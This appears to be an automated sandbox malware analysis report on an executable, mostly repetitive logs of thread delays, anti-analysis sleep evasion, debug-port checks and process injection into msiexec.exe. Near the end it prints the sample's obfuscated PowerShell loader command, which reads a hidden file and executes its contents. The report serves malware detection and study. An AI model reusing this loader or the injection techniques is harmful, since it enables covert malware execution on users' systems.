          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\conhost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599890Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599781Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599671Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599562Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599453Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599343Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599170Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599062Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598941Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598777Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598667Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598560Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598453Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598343Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598234Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598125Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598015Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597906Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597797Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597687Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597578Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597468Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597359Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597250Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597140Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597031Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596921Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596812Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596703Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596593Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596482Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596374Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596262Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596153Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596046Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595937Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595820Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595718Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595578Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595468Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595358Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595249Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595140Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595031Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594921Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594812Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594703Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594593Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594484Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594375Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594265Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7722Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1918Jump to behavior
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsa3CC1.tmp\nsExec.dllJump to dropped file
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6924Thread sleep time: -4611686018427385s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep count: 36 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -33204139332677172s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -600000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6924Thread sleep count: 1713 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -599890s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -599781s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6924Thread sleep count: 8137 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -599671s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -599562s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -599453s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -599343s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -599170s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -599062s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -598941s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -598777s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -598667s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -598560s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -598453s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -598343s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -598234s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -598125s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -598015s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -597906s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -597797s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -597687s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -597578s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -597468s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -597359s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -597250s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -597140s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -597031s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -596921s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -596812s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -596703s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -596593s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -596482s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -596374s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -596262s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -596153s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -596046s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -595937s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -595820s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -595718s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -595578s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -595468s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -595358s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -595249s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -595140s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -595031s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -594921s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -594812s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -594703s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -594593s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -594484s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -594375s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exe TID: 6904Thread sleep time: -594265s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exe TID: 6236Thread sleep time: -30000s >= -30000sJump to behavior
          Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0Jump to behavior
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeCode function: 0_2_00406739 FindFirstFileW,FindClose,0_2_00406739
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeCode function: 0_2_00405AED GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405AED
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeCode function: 0_2_00402902 FindFirstFileW,0_2_00402902
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 922337203685477Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 600000Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599890Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599781Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599671Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599562Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599453Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599343Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599170Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 599062Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598941Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598777Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598667Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598560Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598453Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598343Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598234Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598125Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 598015Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597906Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597797Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597687Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597578Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597468Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597359Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597250Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597140Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 597031Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596921Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596812Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596703Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596593Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596482Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596374Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596262Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596153Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 596046Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595937Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595820Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595718Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595578Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595468Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595358Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595249Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595140Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 595031Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594921Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594812Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594703Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594593Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594484Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594375Jump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeThread delayed: delay time: 594265Jump to behavior
          Source: powershell.exe, 00000001.00000002.1189296404.0000000005858000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter@\Ar
          Source: ModuleAnalysisCache.1.drBinary or memory string: Remove-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000001.00000002.1189296404.0000000005858000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter@\Ar
          Source: ModuleAnalysisCache.1.drBinary or memory string: Add-NetEventVmNetworkAdapter
          Source: powershell.exe, 00000001.00000002.1189296404.0000000005858000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter@\Ar
          Source: msiexec.exe, 00000003.00000002.2179525179.000000000472A000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.2179525179.0000000004788000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2182251034.0000020CE805A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000004.00000002.2179073129.0000020CE2A2B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: ModuleAnalysisCache.1.drBinary or memory string: Get-NetEventVmNetworkAdapter
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeAPI call chain: ExitProcess graph end nodegraph_0-3937
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeAPI call chain: ExitProcess graph end nodegraph_0-3942
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_05157901 LdrInitializeThunk,1_2_05157901
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
          Source: C:\Windows\SysWOW64\msiexec.exeProcess token adjusted: DebugJump to behavior

          HIPS / PFW / Operating System Protection Evasion

          barindex
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Windows\SysWOW64\msiexec.exeJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Windows\SysWOW64\msiexec.exeJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Windows\SysWOW64\msiexec.exe base: 3B00000Jump to behavior
          Source: C:\Users\user\Desktop\4PYRGCo1Di.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -windowstyle minimized "$nybyggedes=gc -Raw 'C:\Users\user\AppData\Roaming\svampestuvningernes\Circumcising\Subcommissionership\Chancebilister.Kon';$Trichopteron=$nybyggedes.SubString(53919,3);.$Trichopteron($nybyggedes)"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"Jump to behavior
